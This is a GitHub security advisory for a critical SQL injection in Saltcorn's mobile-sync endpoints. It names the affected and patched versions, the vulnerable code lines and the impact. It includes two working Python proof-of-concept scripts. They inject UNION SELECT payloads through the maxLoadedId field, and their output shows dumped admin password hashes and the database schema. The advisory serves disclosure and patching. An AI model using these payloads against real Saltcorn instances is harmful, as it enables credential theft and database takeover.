Skip to content

Saltcorn: SQL Injection via Unparameterized Sync Endpoints (maxLoadedId)

Critical severity GitHub Reviewed Published Apr 16, 2026 in saltcorn/saltcorn • Updated Apr 16, 2026

Package

npm @saltcorn/server (npm)

Affected versions

< 1.4.6
>= 1.5.0-beta.0, < 1.5.6
>= 1.6.0-alpha.0, < 1.6.0-beta.5

Patched versions

1.4.6
1.5.6
1.6.0-beta.5

Description

Summary

Saltcorn's mobile-sync routes (POST /sync/load_changes and POST /sync/deletes) interpolate user-controlled values directly into SQL template literals without parameterization, type-casting, or sanitization. Any authenticated user (role_id ≥ 80, the default "user" role) who has read access to at least one table can inject arbitrary SQL, exfiltrate the entire database including admin password hashes, enumerate all table schemas, and—on a PostgreSQL-backed instance—execute write or DDL operations.

Details

Vulnerable code paths

Primary: packages/server/routes/sync.jsgetSyncRows() function

// Line 68 — maxLoadedId branch (no syncFrom)
where data_tbl."${db.sqlsanitize(pkName)}" > ${syncInfo.maxLoadedId}

// Line 100 — maxLoadedId branch (with syncFrom)
and info_tbl.ref > ${syncInfo.maxLoadedId}

syncInfo is taken verbatim from req.body.syncInfos[tableName]. There is no parseInt(), isFinite(), or parameterized binding applied to maxLoadedId before it is embedded into the SQL string passed to db.query().

db.sqlsanitize() is used elsewhere in the same query to quote identifiers (table and column names) — a correct use — but is never applied to values, and would not prevent injection anyway because it only escapes double-quote characters.

Variant H1-V2: packages/server/routes/sync.jsgetDelRows() function (lines 173–190)

// Lines 182-183 — syncUntil and syncFrom come from req.body.syncTimestamp / syncFrom where alias.max < to_timestamp(${syncUntil.valueOf() / 1000.0})   and alias.max > to_timestamp(${syncFrom.valueOf() / 1000.0})

syncUntil = new Date(syncTimestamp) where syncTimestamp comes from req.body. The resulting .valueOf() / 1000.0 is still interpolated as a raw numeric expression.

Route handler: lines 113–170 (/load_changes)

router.post(
  "/load_changes",
  loggedIn,           // <-- only authentication check; no input validation
  error_catcher(async (req, res) => {
    const { syncInfos, loadUntil } = req.body || {};
    ...
    // syncInfos[tblName].maxLoadedId is passed directly into getSyncRows

PoC

Please find the attached script to dump the user's DB using a normal user account.

Dumping users table

#!/usr/bin/env python3
import requests
import json
import re

BASE = "http://localhost:3000"
EMAIL = "ccx@ccx.com"
PASSWORD = "Abcd1234!"

s = requests.Session()

print("[*] Fetching login page...")
r = s.get(f"{BASE}/auth/login")
match = re.search(r'_sc_globalCsrf = "([^"]+)"', r.text)
csrf_login = match.group(1)

print("[*] Logging in...")
r = s.post(f"{BASE}/auth/login", json={"email": EMAIL, "password": PASSWORD, "_csrf": csrf_login})

print("[*] Extracting authenticated CSRF token...")
r = s.get(f"{BASE}/")
match = re.search(r'_sc_globalCsrf = "([^"]+)"', r.text)
csrf = match.group(1)

print("[*] Dumping users...")
payload = "999 UNION SELECT 1,email,password,CAST(role_id AS TEXT),CAST(id AS TEXT) FROM users--"
body = {"syncInfos": {"notes": {"maxLoadedId": payload}}, "loadUntil": "2030-01-01"}
headers = {"CSRF-Token": csrf, "Content-Type": "application/json"}

r = s.post(f"{BASE}/sync/load_changes", json=body, headers=headers)

if r.status_code == 200:
    print(json.dumps(r.json(), indent=2))
else:
    print(f"Failed: {r.status_code}")

Output:

(dllm) dllm@dllm:~/Downloads/saltcorn/artifacts/scripts$ python poc_h1_sqli_minimal.py
[*] Fetching login page...
[*] Logging in...
[*] Extracting authenticated CSRF token...
[*] Dumping users...
{
  "notes": {
    "rows": [
      {
        "_sync_info_tbl_ref_": "1",
        "_sync_info_tbl_last_modified_": "admin@admin.com",
        "_sync_info_tbl_deleted_": "$2a$10$BiEwZkMIpaBrj5yySQhbVuObOp5bpPpfxZYZDtV.VCTv.UxfI7o.6",
        "id": "1",
        "owner_id": "1"
      },
      {
        "_sync_info_tbl_ref_": "80",
        "_sync_info_tbl_last_modified_": "ccx@ccx.com",
        "_sync_info_tbl_deleted_": "$2a$10$B0WWDy27n1H5D6M0.drOfOlCfp39jcsmk2Ueopx6R3SUwDV/ii0Hm",
        "id": "80",
        "owner_id": "2"
      }
    ],
    "maxLoadedId": "80"
  }
}

Dumping schema

Use the following script below to dump the schema:

#!/usr/bin/env python3
import requests
import json
import re

BASE = "http://localhost:3000"
EMAIL = "ccx@ccx.com"
PASSWORD = "Abcd1234!"

s = requests.Session()

print("[*] Fetching login page...")
r = s.get(f"{BASE}/auth/login")
match = re.search(r'_sc_globalCsrf = "([^"]+)"', r.text)
csrf_login = match.group(1)

print("[*] Logging in...")
r = s.post(f"{BASE}/auth/login", json={"email": EMAIL, "password": PASSWORD, "_csrf": csrf_login})

print("[*] Extracting authenticated CSRF token...")
r = s.get(f"{BASE}/")
match = re.search(r'_sc_globalCsrf = "([^"]+)"', r.text)
csrf = match.group(1)

print("[*] Enumerating database schema...")
payload = "999 UNION SELECT 1,name,type,CAST(sql AS TEXT),NULL FROM sqlite_master WHERE type='table'--"
body = {"syncInfos": {"notes": {"maxLoadedId": payload}}, "loadUntil": "2030-01-01"}
headers = {"CSRF-Token": csrf, "Content-Type": "application/json"}

r = s.post(f"{BASE}/sync/load_changes", json=body, headers=headers)

if r.status_code == 200:
    print(json.dumps(r.json(), indent=2))
else:
    print(f"HTTP {r.status_code}: {r.text[:500]}")

Output:

(dllm) dllm@dllm:~/Downloads/saltcorn/artifacts/scripts$ python poc_h1_schema_enum.py 
[*] Fetching login page...
[*] Logging in...
[*] Extracting authenticated CSRF token...
[*] Enumerating database schema...
{
  "notes": {
    "rows": [
      {
        "_sync_info_tbl_ref_": "CREATE TABLE \"notes\" (id integer primary key, owner_id INTEGER)",
        "_sync_info_tbl_last_modified_": "notes",
        "_sync_info_tbl_deleted_": "table",
        "id": "CREATE TABLE \"notes\" (id integer primary key, owner_id INTEGER)",
        "owner_id": null
      },
<SNIP>
    "maxLoadedId": "CREATE TABLE users (\n      id integer primary key,      \n      email VARCHAR(128) not null unique,\n      password VARCHAR(60),\n      role_id integer not null references _sc_roles(id)\n    , reset_password_token text, reset_password_expiry timestamp, \"language\" text, \"disabled\" boolean not null default false, \"api_token\" text, \"_attributes\" json, \"verification_token\" text, \"verified_on\" timestamp, last_mobile_login timestamp)"
  }
}

Impact

  • Confidentiality: CRITICAL — Attacker reads the entire database: all user credentials (bcrypt hashes), configuration secrets including _sc_config, all user-created data, and the full schema.
  • Integrity: CRITICAL — On PostgreSQL the same endpoint can execute INSERT/UPDATE/DELETE/DROP. On SQLite, multiple-statement injection may be possible depending on driver configuration.
  • Availability: CRITICAL — Attacker can DROP tables or corrupt the database.
  • Scope: Changed — Any authenticated user (role_id=80) can access admin-tier data and beyond.
  • Privilege escalation — Admin password hashes are exfiltrated; offline cracking of weak passwords grants admin access.

References

@glutamate glutamate published to saltcorn/saltcorn Apr 16, 2026
Published to the GitHub Advisory Database Apr 16, 2026
Reviewed Apr 16, 2026
Last updated Apr 16, 2026

Severity

Critical

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

EPSS score

Weaknesses

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. Learn more on MITRE.

CVE ID

No known CVE

GHSA ID

GHSA-jp74-mfrx-3qvh

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.